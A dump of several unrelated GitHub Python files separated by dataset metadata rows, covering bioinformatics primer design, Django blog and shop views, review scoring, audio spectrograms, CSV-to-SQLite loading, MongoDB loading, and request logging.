down_exon = utils.get_pos(line[2]) # user's downstream exon
else:
up_exon = None # user did not provide upstream exon
down_exon = None # user did not provide downstream exon
# This try block is to catch assertions made about the graph. If a
# PrimerSeqError is raised it only impacts a single target for primer
# design so complete exiting of the program is not warranted.
try:
# if the gtf doesn't have a valid gene_id attribute then use
# the first method otherwise use the second method.
if options['no_gene_id']:
gene_dict, gene_name = get_weakly_connected_tx(args_gtf, strand, chr, tmp_start, tmp_end) # hopefully filter out junk
else:
gene_dict, gene_name = get_from_gtf_using_gene_name(args_gtf, strand, chr, tmp_start, tmp_end)
# extract all edge weights only once
edge_weights_list = [sam_obj.extractSamRegion(chr, gene_dict['start'], gene_dict['end'])
for sam_obj in sam_obj_list]
# The following options['both_flag'] determines how the splice graph is constructed.
# The splice graph can be either constructed from annotation junctions
# where options['both_flag']==False or RNA-Seq + annotation junctions when
# options['both_flag']==True.
# single pooled count data splice graph
splice_graph = construct_splice_graph(edge_weights_list,
gene_dict,
chr,
strand,
options['read_threshold'],
options['min_jct_count'],
output_type='single',
both=options['both_flag'])
# Second, get a splice graph for each BAM file
single_bam_splice_graphs = construct_splice_graph(edge_weights_list,
gene_dict,
chr,
strand,
options['read_threshold'],
options['min_jct_count'],
output_type='list',
both=options['both_flag'])
### Logic for choosing methodology of primer design ###
# user-defined flanking exon case
if up_exon and down_exon:
if gene_dict['target'] not in gene_dict['exons']:
raise utils.PrimerSeqError('Error: target exon was not found in gtf annotation')
elif up_exon not in gene_dict['exons']:
raise utils.PrimerSeqError('Error: upstream exon not in gtf annotation')
elif down_exon not in gene_dict['exons']:
raise utils.PrimerSeqError('Error: downstream exon not in gtf annotation')
tmp = predefined_exons_case(name, # ID for exon (need to save as json)
gene_dict['target'], # target exon tuple (start, end)
splice_graph, # SpliceGraph object
genome, # pygr genome variable
up_exon, # upstream flanking exon
down_exon) # downstream flanking exon
# always included case
elif options['psi'] > .9999:
# note this function ignores edge weights
tmp = get_flanking_biconnected_exons(tgt, gene_dict['target'],
splice_graph,
genome)
# user specified a sufficient psi value to call constitutive exons
else:
tmp = get_sufficient_psi_exons(tgt, gene_dict['target'],
splice_graph,
genome,
name,
options['psi'],
up_exon,
down_exon) # note, this function utilizes edge wieghts
### End methodology specific primer design ###
# Error msgs are of length one, so only do psi calculations for
# non-error msgs
if len(tmp) > 1:
# edit target psi value
tmp_all_paths = tmp[-4] # CAREFUL the index for the AllPaths object may change
tmp[2] = calculate_target_psi(gene_dict['target'],
single_bam_splice_graphs,
tmp_all_paths.component,
up_exon=None,
down_exon=None)
# up_exon=up_exon,
# down_exon=down_exon) # CAREFUL index for psi_target may change
tmp.append(gene_name)
# append result to output list
output.append(tmp)
except (utils.PrimerSeqError,):
t, v, trace = sys.exc_info()
output.append([str(v)]) # just append assertion msg
return output
if __name__ == '__main__':
"""Running this script directly is only for debug purposes"""
# process command line arguments
parser = argparse.ArgumentParser(description='Get flanking constitutive exons')
parser.add_argument('-b', '--big-bed', action='store', dest='big_bed', required=True,
help='annotation file with legitimate gene_id\'s')
parser.add_argument('-t', '--target', action='store', dest='target', required=True,
help='file of list of coordinate targets')
parser.add_argument('-f', '--fasta', action='store', dest='fasta', required=True)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--annotaton', dest='annotation_flag', action='store_true')
group.add_argument('--rnaseq', dest='rnaseq_flag', action='store_true')
group.add_argument('--both', dest='both_flag', action='store_true')
parser.add_argument('--psi', dest='psi', action='store', type=float)
parser.add_argument('--read-threshold', dest='read_threshold', type=int, action='store')
parser.add_argument('-o', '--output', action='store', dest='output', required=True)
options = vars(parser.parse_args())
options['target'] = options['target'].replace('dash', '-').split(',') # fix bug with - as input for strand
# call main function
main(options, options['output'])
| ctokheim/PrimerSeq | splice_graph.py | splice_graph.py | py | 24,773 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "networkx.DiGraph",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "networkx.DiGraph",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "utils.PrimerSeqError",
"line_number": 118,
"usage_type": "call"
},
{
"api_name": "networkx.weak... |
2849684748 | from django.urls import path
from .views import blog_post,\
blogview,\
search_blog, \
all_blog, \
post_detail,\
createpost, \
updatepost
urlpatterns = [
path('', blogview, name='blogview'),
path('create-post', createpost, name='create-post'),
path('all-blog', all_blog, name = 'all-blog'),
path('all-blog/<id>', blog_post, name = 'blog-post'),
path('<id>', post_detail, name = 'post-detail'),
path('<id>/post-update', updatepost, name='update-post'),
path('search-blog' ,search_blog, name='search-blog'),
]
| myfrank4everreal/baronshoes_v_2.0 | blog/urls.py | urls.py | py | 585 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "views.blogview",
"line_number": 12,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "views.createpost... |
75321076905 | from modules.amazon_parser import *
from collections import defaultdict
from cosine_sim import cosine_sim
reviews = parserJSON('./library/amazon-review-data.json',)
"""
keys of reviews
`Rate`
`reviewText`
`video`
`verifiedPurchase`
`Date`
`productId`
`reviewId`
`memberId`
`reviewTitle`
"""
#rating for product p given by certain user 'm' and average given by other users.
####IRD####
def IRD(reviews):
productRatingDictionary = defaultdict(lambda: {"review_counts": 0, "cumulative_score": 0}) #key is `productId` -> {"productId":{"review_counts": int, "cumulative_score": float}}
customerToProductDictionary = defaultdict(lambda: []) #key is `memberId` -> {"memberId":[productA, productB, ...etc]}
customerVectorDictionary = defaultdict(lambda: []) #key is `memberId` -> {"memberId":[feature1, feature2, etc...]}
customerIRD = defaultdict(lambda:defaultdict(lambda:0))
for review in reviews: #build up dictionaries
if (review["productId"]!= "None" and review["memberId"]!= "None"):
productRatingDictionary[ review["productId"] ]["cumulative_score"] += review["Rate"]
productRatingDictionary[ review["productId"] ]["review_counts"] += 1
customerToProductDictionary[ review["memberId"] ].append((review["productId"], review["Rate"])) #should further consider that reviewer has multiple ratings on the same product
for key in customerToProductDictionary:
for product in customerToProductDictionary[key]:
UserID = key
ProductID = product[0]
UserRating = product[1]
try:
AvgProductRating = (productRatingDictionary[ product[0] ]["cumulative_score"] - UserRating)/(productRatingDictionary[ product[0] ]["review_counts"] - 1)
except ZeroDivisionError:
AvgProductRating = UserRating
IRD = (UserRating - AvgProductRating) / 4
customerIRD[UserID][ProductID] = IRD
return customerIRD
#customerVectorDictionary[]
#print(customerToProductDictionary[key])
####ICS####
def ICS(reviews):
customerToProductDictionary = defaultdict(lambda:defaultdict(lambda:[]))
ICS_Dictionary = defaultdict(lambda:defaultdict(lambda:0))
for review in reviews: #build up dictionaries
if (review["productId"]!= "None" and review["memberId"]!= "None"):
customerToProductDictionary[ review["memberId"] ][ review["productId"] ].append(review["reviewText"])
for member in customerToProductDictionary:
for productId in customerToProductDictionary[member]:
temp = 0
cnt = 0
if len(customerToProductDictionary[member][productId]) > 1: #check if the same memeber review on a product repeatedly
for i in customerToProductDictionary[member][productId]:
for j in customerToProductDictionary[member][productId]:
if i != j:
temp = cosine_sim(i, j)
cnt += 1
if cnt != 0:
ICS = 1.0* temp/cnt #take average
ICS_Dictionary[member][productId] = ICS
return ICS_Dictionary
| josiahcoad/Faker | individual_kevin.py | individual_kevin.py | py | 3,188 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 28,
"usage_type": "call"
},
{
"api_name"... |
70596977383 | #Create a dataset of normalised spectrograms from files
import os
import numpy as np
import librosa
import audiofile as af
import configparser
from utils.audioTools import getSpectro
debugFlag = False
def main():
config = configparser.ConfigParser()
if debugFlag == True:
config.read(r'configTest.cfg')
else:
config.read(r'config.cfg')
dsName = config.get('Dataset', 'name')
fftLength = int(config.get('Dataset', 'fftLength'))
nFreq = int(config.get('Dataset', 'nFreq'))
numFeatures = int(config.get('Dataset', 'numFeatures'))
#Might want to rename data to fit whatever user might want
musicFiles = [os.path.join(path, name) for path, subdirs, files in os.walk("data/") for name in files]
#If folder already exist, quit
if os.path.exists(dsName):
print("ERROR: The folder '" + dsName + "' already exists ! either delete it or rename it and try again")
# return -1
else:
#Else create folder
os.makedirs(dsName)
os.makedirs(dsName + "/train")
os.makedirs(dsName + "/test/")
for i, song in enumerate(musicFiles):
S = getSpectro(song, fftLength)
#And save
if np.random.uniform(0, 1) > 0.8:
print("Saving " + dsName + "/test/"+os.path.basename(song)[:-4]+".npy")
print("[",i + 1,"/",len(musicFiles), "]")
np.save(dsName + "/test/"+os.path.basename(song)[:-4]+".npy", S)
else:
print("Saving " + dsName + "/train/"+os.path.basename(song)[:-4]+".npy")
print("[",i + 1,"/",len(musicFiles), "]")
np.save(dsName + "/train/"+os.path.basename(song)[:-4]+".npy", S)
if (debugFlag == True):
np.save(dsName + "/test/"+os.path.basename(song)[:-4]+".npy", S)
np.save(dsName + "/train/"+os.path.basename(song)[:-4]+".npy", S)
return 0
if __name__ == "__main__":
main()
| epsln/chiner | utils/makeDS.py | makeDS.py | py | 1,952 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"li... |
15287830329 | ##encoding=UTF8
"""
author: Sanhe Hu
compatibility: python3 ONLY
prerequisites: angora.SQLITE
import:
from angora.PandasSQL.sqlite3blackhole import CSVFile, Sqlite3BlackHole
"""
from __future__ import print_function
from angora.SQLITE.core import MetaData, Sqlite3Engine, Table, Column, DataType
from angora.DATA.timewrapper import TimeWrapper
from angora.GADGET.logger import Messenger, Log
from collections import deque
import pandas as pd, numpy as np
class CSVFile():
"""a CSV datafile class
[args]
------
path:
csv file absolute path
table_name:
the table name you map the csv data to
sep:
csv seperator, default ','
header:
has header?
usecols:
a index list tells which columns you want to use. for example [1, 4, 5] means
you only use the second, fifth and sixth columns
dtype:
define the data type for each columns in a dictionary. valid dtypes are:
TEXT, INTEGER, REAL, DATE, DATETIME
example: {"column_name1": "TEXT", "column_name2": "INTEGER"}
primary_key_columns:
a index list tells which columns are primary keys. for example you use [1, 4, 5] for
usecols. and you use [2] for primary_key_columns. means the sixth columns is primary key.
"""
def __init__(self, path,
table_name = None,
sep = ",",
header = None,
usecols = None,
dtype = dict(),
primary_key_columns = list()):
self.path = path
self.table_name = table_name
self.sep = sep
if header:
self.header = 0
else:
self.header = None
self.usecols = usecols
self.dtype = dtype
# 强行转化为字符串, 确定表列index = 数据表中的列名, 且为合法字符串
self.primary_key_columns = list()
for i in primary_key_columns:
if not isinstance(i, str):
self.primary_key_columns.append("c" + str(i))
else:
self.primary_key_columns.append(i)
self._read_metadata()
self.timewrapper = None
def _read_metadata(self):
"""construct the metadata for creating the database table
"""
self.metadata = MetaData()
datatype = DataType()
### map the CSV.dtype definition to pandas.read_csv dtype and sqlite3 dtype
_pd_dtype_mapping = {"TEXT": np.str, "INTEGER": np.int64,
"REAL": np.float64,
"DATE": np.str, "DATETIME": np.str}
_db_dtype_mapping = {"TEXT": datatype.text, "INTEGER": datatype.integer,
"REAL": datatype.real,
"DATE": datatype.date, "DATETIME": datatype.datetime}
pd_dtype = dict() # {"column_name": dtype} for part of columns, other columns using default setting
db_dtype = dict() # {"column_name": dtype} for all columns
for column_name, data_type in self.dtype.items():
if data_type in _pd_dtype_mapping:
pd_dtype[column_name] = _pd_dtype_mapping[data_type]
if data_type in _db_dtype_mapping:
db_dtype[column_name] = _db_dtype_mapping[data_type]
### Read one row, and extract column information from csv
if self.usecols:
df = pd.read_csv(self.path, sep=self.sep, header=self.header,
nrows=1, dtype=pd_dtype, usecols=self.usecols)
else:
df = pd.read_csv(self.path, sep=self.sep, header=self.header,
nrows=1, dtype=pd_dtype)
# 强行转化为字符串, 却表列index = 数据表中的列名, 且为合法字符串
new_columns = list()
for i in df.columns:
if not isinstance(i, str):
new_columns.append("c" + str(i))
else:
new_columns.append(i)
df.columns = new_columns
### Define the right data type in database for each column
for column_name, data_type in zip(df.columns, df.dtypes):
if column_name not in db_dtype:
if data_type in [np.object,]:
db_dtype.setdefault(column_name, datatype.text)
elif data_type in [np.int64, np.int32, np.int16, np.int8, np.int0, np.int]:
db_dtype.setdefault(column_name, datatype.integer)
elif data_type in [np.float64, np.float32, np.float16, np.float]:
db_dtype.setdefault(column_name, datatype.real)
self.pd_dtype = pd_dtype
self.db_dtype = db_dtype
### Construct Database.Table Metadata
columns = list()
for column_name, data_type in zip(df.columns, df.dtypes):
if column_name in self.primary_key_columns:
primary_key_flag = True
else:
primary_key_flag = False
columns.append(Column(column_name, db_dtype[column_name], primary_key=primary_key_flag))
Table(self.table_name, self.metadata, *columns)
self.table = self.metadata.tables[self.table_name]
def generate_records(self, chunksize=1000*1000):
"""generator for sqlite3 database friendly record from a data file
"""
if self.usecols:
for df in pd.read_csv(self.path,
sep=self.sep,
header=self.header,
dtype=self.pd_dtype,
usecols=self.usecols,
iterator=True,
chunksize=chunksize):
for column_name, dtype in self.db_dtype.items(): # 修改Date和DateTime列的dtype
if dtype.name == "DATE": # 转换为 datestr
df[column_name] = df[column_name].apply(self.timewrapper.isodatestr)
if dtype.name == "DATETIME": # 转换为 datetimestr
df[column_name] = df[column_name].apply(self.timewrapper.isodatetimestr)
for record in df.values:
yield record
else:
for df in pd.read_csv(self.path,
sep=self.sep,
header=self.header,
dtype=self.pd_dtype,
iterator=True,
chunksize=chunksize):
for column_name, dtype in self.db_dtype.items(): # 修改Date和DateTime列的dtype
if dtype.name == "DATE": # 转换为 datestr
df[column_name] = df[column_name].apply(self.timewrapper.isodatestr)
if dtype.name == "DATETIME": # 转换为 datetimestr
df[column_name] = df[column_name].apply(self.timewrapper.isodatetimestr)
for record in df.values:
yield record
class Sqlite3BlackHole():
"""a CSV data to Sqlite3 database engine. Can take data into database in two mode:
1. devour: map CSV file to a table, if meet sqlite3.IntegrityError, skip it
2. update: unlike devour, if meet sqlite3.IntegrityError, update the data entry
That's why I call it BlackHole.
the typical usage is:
sqlite3blackhole = Sqlite3BlackHole("your_sqlite3_database_name.db")
csvfile = CSVFile(r"test_data/employee1.txt",
table_name="employee",
sep=",",
header=True,
dtype={"employee_id": "TEXT", "start_date": "DATE"},
primary_key_columns=["employee_id"])
sqlite3blackhole.add(csvfile)
... add more file
sqlite3blackhold.devour()
"""
def __init__(self, dbname):
self.engine = Sqlite3Engine(dbname)
self.metadata = MetaData()
self.pipeline = deque()
self.timewrapper = TimeWrapper()
self.messenger = Messenger()
self.log = Log()
def add(self, datafile):
"""add datafile object to data pipeline
"""
datafile.timewrapper = self.timewrapper
self.pipeline.append(datafile)
def devour(self):
"""if sqlite3.IntegrityError been raised, skip the record.
"""
while len(self.pipeline) >= 1:
self.messenger.show("%s files to process..." % len(self.pipeline))
datafile = self.pipeline.popleft()
self.messenger.show("now processing %s..." % datafile.path)
datafile.metadata.create_all(self.engine)
try:
ins = datafile.table.insert()
# insert only, if failed, do nothing
self.engine.insert_many_records(ins, datafile.generate_records())
self.messenger.show("\tfinished!")
except:
self.log.write(datafile.path)
def update(self):
"""unlike Sqlite3BlackHole.devour(), if sqlite3.IntegrityError been raised,
update the record.
"""
while len(self.pipeline) >= 1:
self.messenger.show("%s files to process..." % len(self.pipeline))
datafile = self.pipeline.popleft()
self.messenger.show("now processing %s..." % datafile.path)
datafile.metadata.create_all(self.engine)
try:
ins = datafile.table.insert()
# insert and update
self.engine.insert_and_update_many_records(ins, datafile.generate_records())
self.messenger.show("\tfinished!")
except:
self.log.write(datafile.path)
| MacHu-GWU/Angora | angora/PandasSQL/sqlite3blackhole.py | sqlite3blackhole.py | py | 10,015 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "angora.SQLITE.core.MetaData",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "angora.SQLITE.core.DataType",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.str",
"line_number": 78,
"usage_type": "attribute"
},
{
"api_name":... |
9587688117 | # -*- coding: utf-8 -*-
import Jarvis
import colorama
import sys
def check_python_version():
return sys.version_info[0] == 3
def main():
# enable color on windows
colorama.init()
# start Jarvis
jarvis = Jarvis.Jarvis()
command = " ".join(sys.argv[1:]).strip()
jarvis.executor(command)
if __name__ == '__main__':
if check_python_version():
main()
else:
print("Sorry! Only Python 3 supported.")
| sukeesh/Jarvis | jarviscli/__main__.py | __main__.py | py | 451 | python | en | code | 2,765 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colorama.init",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "Jarvis.Jarvis",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line... |
11232703752 | from django.shortcuts import render, get_object_or_404
from .models import Post, Group
def index(request):
"""YaTube - main."""
TEMPLATE = 'posts/index.html'
posts = Post.objects.order_by('-pub_date')[:10]
context = {
'posts': posts
}
return render(request, TEMPLATE, context)
def group_posts(request, slug):
"""YaTube - page group_posts."""
TEMPLATE = 'posts/group_list.html'
group = get_object_or_404(Group, slug=slug)
posts = group.posts.all()[:10]
context = {
'group': group,
'posts': posts,
}
return render(request, TEMPLATE, context)
| semenov-max/yatube_project | yatube/posts/views.py | views.py | py | 620 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.Post.objects.order_by",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "models.Post.objects",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "models.Post",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django... |
23640743170 | from pymongo import MongoClient
from config import DB_USER, DB_PASSWORD, DB_IP_ADDR, DB_AUTH_SOURCE
from console import console, Progress
from time import sleep
def connect_to_db():
console.print("Підключення до бази даних...", end="")
try:
client = MongoClient(DB_IP_ADDR, username=DB_USER, password=DB_PASSWORD, authSource=DB_AUTH_SOURCE, authMechanism='SCRAM-SHA-256', tls=True, tlsAllowInvalidCertificates=True)
console.print(f"[black on green]УСПІШНО[/]")
except:
console.print(f"[black on red]ПОМИЛКА[/]")
return client
def use_vst(client):
console.print("Пошук бази... ", end="")
try:
vst = client["vst"]
console.print(f"[black on green]УСПІШНО[/]")
except:
console.print(f"[black on red]ПОМИЛКА[/]")
return vst
def get_collection(vst, collection):
console.print(f"Пошук колекції {collection}... ", end="")
try:
col = vst[collection]
console.print(f"[black on green]УСПІШНО[/]")
except:
console.print(f"[black on red]ПОМИЛКА[/]")
return col
def update_specs(vst, spec_list):
def _insert():
with Progress() as prog:
task = prog.add_task("[light_sea_green]Оновлення...", total=len(spec_list)+3)
sl = []
for spec in spec_list:
spe = {"code": spec[0], "name": spec[1]}
sl += [spe]
# specs.insert_one(spe)
sleep(0.002)
prog.update(task, advance=1)
specs.insert_many(sl)
prog.update(task, advance=3)
console.print("Оновлення списку спеціальностей... ", end="")
if "specs" in vst.list_collection_names():
vst["specs"].drop()
specs = vst["specs"]
else:
specs = vst["specs"]
console.print(f"[black on blue]ПЕРЕДАНО[/]")
_insert()
def update_univs(vst, udata):
def _insert():
univs.insert_many(
udata
)
console.print(f"[black on green]УСПІШНО[/]")
console.print("Оновлення списку спеціальностей... ", end="")
if "univs" in vst.list_collection_names():
vst["univs"].drop()
univs = vst["univs"]
else:
univs = vst["univs"]
_insert()
| WebUraXalys/vstupBot | parser/db.py | db.py | py | 2,401 | python | uk | code | 0 | github-code | 36 | [
{
"api_name": "console.console.print",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "console.console",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "pymongo.MongoClient",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "config.DB_IP_... |
18876976348 | # coding=utf-8
import copy
import logging
import traceback
import time
import socket
from collections import namedtuple
from functools import partial
from logging.handlers import SysLogHandler, WatchedFileHandler
import tornado.options
from tornado.options import options
from tornado.escape import to_unicode
try:
import frontik.options
from graypy.handler import GELFHandler, LAN_CHUNK
class BulkGELFHandler(GELFHandler):
@staticmethod
def format_time(record):
t = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(record.created))
return "%s,%03d" % (t, record.msecs)
def handle_bulk(self, records_list, stages=None, status_code=None, uri=None, method=None, **kwargs):
if len(records_list) > 0:
first_record = records_list[0]
else:
return
record_for_gelf = copy.deepcopy(first_record)
record_for_gelf.message = u''
record_for_gelf.exc_info = None
record_for_gelf.short = u"{0} {1} {2}".format(method, to_unicode(uri), status_code)
record_for_gelf.levelno = logging.INFO
record_for_gelf.name = None
record_for_gelf.code = status_code
for record in records_list:
if record_for_gelf.name is None and hasattr(record, 'handler'):
record_for_gelf.name = repr(record.handler)
message = to_unicode(record.getMessage())
if record.levelno > record_for_gelf.levelno:
record_for_gelf.levelno = record.levelno
record_for_gelf.lineno = record.lineno
record_for_gelf.short = message
# only the last exception will be sent in exc_info
if record.exc_info is not None:
exception_text = u'\n' + u''.join(map(to_unicode, traceback.format_exception(*record.exc_info)))
record_for_gelf.exc_info = record.exc_info
record_for_gelf.short += exception_text
record_for_gelf.message += u' {time} {level} {msg} \n'.format(
time=self.format_time(record), level=record.levelname, msg=message
)
if stages is not None:
for s in stages:
setattr(record_for_gelf, s.name + '_stage', str(int(s.delta)))
GELFHandler.handle(self, record_for_gelf)
GELFHandler.close(self)
except ImportError:
import frontik.options
options.graylog = False
log = logging.getLogger('frontik.handler')
class ContextFilter(logging.Filter):
def filter(self, record):
record.name = '.'.join(filter(None, [record.name, getattr(record, 'request_id', None)]))
return True
log.addFilter(ContextFilter())
class PerRequestLogBufferHandler(logging.Logger):
"""
Handler for storing all LogRecords for current request in a buffer until finish
"""
def __init__(self, name, level=logging.NOTSET):
super(PerRequestLogBufferHandler, self).__init__(name, level)
self.records_list = []
self.bulk_handlers = []
def handle(self, record):
log.handle(record)
self.records_list.append(record)
def add_bulk_handler(self, handler, auto_flush=True):
self.bulk_handlers.append((handler, auto_flush))
if not auto_flush:
handler.flush = partial(self.flush_bulk_handler, handler)
def flush_bulk_handler(self, handler, **kwargs):
handler.handle_bulk(self.records_list, **kwargs)
def flush(self, **kwargs):
for handler, auto_flush in self.bulk_handlers:
if auto_flush:
self.flush_bulk_handler(handler, **kwargs)
class RequestLogger(logging.LoggerAdapter):
Stage = namedtuple('Stage', ('name', 'delta', 'start_delta'))
def __init__(self, request, request_id):
self._handler = None
self._last_stage_time = self._start_time = request._start_time
super(RequestLogger, self).__init__(PerRequestLogBufferHandler('frontik.handler'), {'request_id': request_id})
self.stages = []
# backcompatibility with logger
self.warn = self.warning
self.addHandler = self.logger.addHandler
if options.graylog:
self.logger.add_bulk_handler(
BulkGELFHandler(options.graylog_host, options.graylog_port, LAN_CHUNK, False)
)
def register_handler(self, handler):
self._handler = handler
self.extra['handler'] = handler
def stage_tag(self, stage_name):
stage_end_time = time.time()
stage_start_time = self._last_stage_time
self._last_stage_time = stage_end_time
delta = (stage_end_time - stage_start_time) * 1000
start_delta = (stage_start_time - self._start_time) * 1000
stage = RequestLogger.Stage(stage_name, delta, start_delta)
self.stages.append(stage)
self.debug('stage "%s" completed in %.2fms', stage.name, stage.delta, extra={'_stage': stage})
def get_current_total(self):
return sum(s.delta for s in self.stages)
def log_stages(self, status_code):
"""Writes available stages, total value and status code"""
stages_str = ' '.join('{s.name}={s.delta:.2f}'.format(s=s) for s in self.stages)
total = sum(s.delta for s in self.stages)
self.info(
'timings for %(page)s : %(stages)s',
{
'page': repr(self._handler),
'stages': '{0} total={1:.2f} code={2}'.format(stages_str, total, status_code)
},
)
def process(self, msg, kwargs):
if 'extra' in kwargs:
kwargs['extra'].update(self.extra)
else:
kwargs['extra'] = self.extra
return msg, kwargs
def add_bulk_handler(self, handler, auto_flush=True):
self.logger.add_bulk_handler(handler, auto_flush)
def request_finish_hook(self, status_code, request_method, request_uri):
self.logger.flush(status_code=status_code, stages=self.stages, method=request_method, uri=request_uri)
def bootstrap_logging():
"""This is a replacement for standard Tornado logging configuration."""
root_logger = logging.getLogger()
level = getattr(logging, options.loglevel.upper())
root_logger.setLevel(logging.NOTSET)
if options.logfile:
handler = logging.handlers.WatchedFileHandler(options.logfile)
handler.setFormatter(logging.Formatter(options.logformat))
handler.setLevel(level)
root_logger.addHandler(handler)
if options.stderr_log:
if hasattr(tornado.options, 'enable_pretty_logging'):
# Old Tornado version
tornado.options.enable_pretty_logging(level)
else:
from tornado.log import LogFormatter
handler = logging.StreamHandler()
handler.setFormatter(
LogFormatter(
fmt=tornado.options.options.stderr_format, datefmt=tornado.options.options.stderr_dateformat
)
)
handler.setLevel(level)
root_logger.addHandler(handler)
if options.syslog:
try:
syslog_handler = SysLogHandler(
facility=SysLogHandler.facility_names[options.syslog_facility],
address=options.syslog_address
)
syslog_handler.setFormatter(logging.Formatter(options.logformat))
syslog_handler.setLevel(level)
root_logger.addHandler(syslog_handler)
except socket.error:
logging.getLogger('frontik.logging').exception('cannot initialize syslog')
for logger_name in options.suppressed_loggers:
logging.getLogger(logger_name).setLevel(logging.WARN)
| nekanek/frontik-without-testing | frontik/frontik_logging.py | frontik_logging.py | py | 7,857 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "graypy.handler.GELFHandler",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "time.strftime",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "time.localtime",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy... |
11425267400 | from django.shortcuts import render, redirect
from .models import Product, SliderImage, Guest, CartItem
from django.http import HttpResponse
from django.db.models import Q
def home(request):
products = Product.objects.all()
slides = SliderImage.objects.all()
category = request.GET.get('category')
brand = request.GET.get('brand')
search = request.GET.get('search')
products = Product.objects.filter(Q(name__icontains=search)) if search else products
products = products.filter(category=category) if category else products
products = products.filter(brand=brand) if brand else products
return render(request, 'home.html', {'products':products, 'slides':slides})
def product(request, pk):
product_data = Product.objects.get(pk=pk)
return render(request, 'product.html', {'product':product_data})
def guest_register(request, pk):
token = request.COOKIES['csrftoken']
guest = Guest.objects.filter(token=token)
if not guest:
Guest.objects.create(token=token)
guest = Guest.objects.filter(token=token)
cart_item = CartItem.objects.filter(product=pk)
if not cart_item:
CartItem.objects.create(
guest = guest[0],
product = Product.objects.get(pk=pk),
quantity = 1,
customer = request.user if request.user.is_authenticated else None
)
else:
cart_item[0].quantity +=1
cart_item[0].save()
return redirect('store:home')
def cart(request):
token = request.COOKIES['csrftoken']
guest = Guest.objects.filter(token=token)
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(customer=request.user)
else:
cart_items = CartItem.objects.filter(guest=guest[0]) if guest else []
return render(request, 'cart.html', {'cart_items': cart_items}) | MairaAllen/django--------3 | top/store/views.py | views.py | py | 1,860 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.Product.objects.all",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "models.Product.objects",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "models.Product",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "mo... |
3050296786 | # coding=utf-8
"""Csv download model definition.
"""
from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.exceptions import ValidationError
from bims.api_views.csv_download import (
send_csv_via_email,
send_rejection_csv,
send_new_csv_notification
)
def validate_file_extension(value):
import os
ext = os.path.splitext(value.name)[1]
valid_extensions = ['.csv']
if ext not in valid_extensions:
raise ValidationError('File not supported!')
class DownloadRequest(models.Model):
"""Csv document model
"""
requester = models.ForeignKey(
settings.AUTH_USER_MODEL,
models.CASCADE,
related_name='download_request_requester',
blank=False,
null=False,
)
request_date = models.DateTimeField(
default=datetime.now
)
request_file = models.FileField(
upload_to='request-files/',
help_text='Only csv file',
null=True,
max_length=300,
validators=[validate_file_extension]
)
processing = models.BooleanField(
default=True
)
approved = models.BooleanField(
default=False
)
request_category = models.CharField(
max_length=256,
default=''
)
rejected = models.BooleanField(
default=False
)
rejection_message = models.TextField(
null=True,
blank=True
)
def get_formatted_name(self):
"""Return author formated full name, e.g. Maupetit J"""
if self.requester.first_name or self.requester.last_name:
return '%s %s' % (
self.requester.first_name, self.requester.last_name)
return self.requester.username
# noinspection PyClassicStyleClass
class Meta:
"""Meta class for project."""
app_label = 'bims'
verbose_name_plural = 'Download requests'
verbose_name = 'Download request'
ordering = ('-request_date',)
def __str__(self):
return '{requester} - {date} - {category}'.format(
requester=self.requester,
date=self.request_date.strftime('%H:%M:%S'),
category=self.request_category
)
def save(self, *args, **kwargs):
old_obj = None
if self._state.adding:
send_new_csv_notification(
self.requester,
self.request_date
)
if self.id:
old_obj = DownloadRequest.objects.get(id=self.id)
if old_obj and not self.processing and not self.rejected:
if self.approved and self.approved != old_obj.approved:
# send email
send_csv_via_email(
self.requester,
self.request_file.path,
self.request_category,
approved=True
)
elif self.rejected and not self.approved and not self.processing:
send_rejection_csv(
self.requester,
self.rejection_message
)
super(DownloadRequest, self).save(*args, **kwargs)
| anhtudotinfo/django-bims | bims/models/download_request.py | download_request.py | py | 3,152 | python | en | code | null | github-code | 36 | [
{
"api_name": "os.path.splitext",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "django.core.exceptions.ValidationError",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "... |
25250856119 | import argparse
import imgkit
import sched
from datetime import datetime, timedelta
from pytz import timezone
from random import randint
from time import sleep, time
from availability_checker import AvailabilityChecker
